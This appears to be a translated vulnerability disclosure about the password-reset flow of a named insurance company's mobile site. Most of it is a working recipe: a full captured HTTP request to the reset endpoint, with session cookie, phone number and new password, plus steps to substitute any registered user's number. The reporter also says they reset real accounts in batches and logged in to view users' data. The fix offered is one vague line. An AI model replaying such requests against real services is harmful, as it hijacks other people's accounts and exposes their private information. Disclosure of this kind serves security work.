Hongkang life can directly reset any user password (reset in seconds) without any restrictions to view sensitive information of any user.
666
Detailed description:
Review: I rejected the previous one. This adds something.
Followed by hongkang Life Insurance
Click "forgot password". The first step is to reset your password step by step.
Capture the package as follows in the last step:
POST /MobileWeb/pass/forget/do/step/03 HTTP/1.1 Host: www.hongkang-life.com Accept: application/json, text/javascript, */*; q=0.01 X-Requested-With: XMLHttpRequest Accept-Encoding: gzip, deflate Accept-Language: zh-cn Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Origin: http://www.hongkang-life.com Content-Length: 58 Connection: close User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 9_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13B143 MicroMessenger/6.3.1 NetType/WIFI Language/zh_CN Referer: http://www.hongkang-life.com/MobileWeb/pass/forget/to/step/03?userName=13888888888 Cookie: Hm_lpvt_95a9bc943e08216049a25e5774291ef8=1446111477; Hm_lvt_95a9bc943e08216049a25e5774291ef8=1444473953,1446111420; JSESSIONID=7768330BA1D6F7857A9E5B578D630DA1.tomcat2 password=qwer1234&rePassword=qwer1234&userName=13267617281
Replace the mobile phone number with any user. The mobile phone number must be a registered user.
If the cookie expires, repeat the previous steps.
I successfully reset the last five digits of 132400xxxxx in batches.
Texture proof
Then log in and check
Proof of vulnerability:
Solution:
Modify the logic.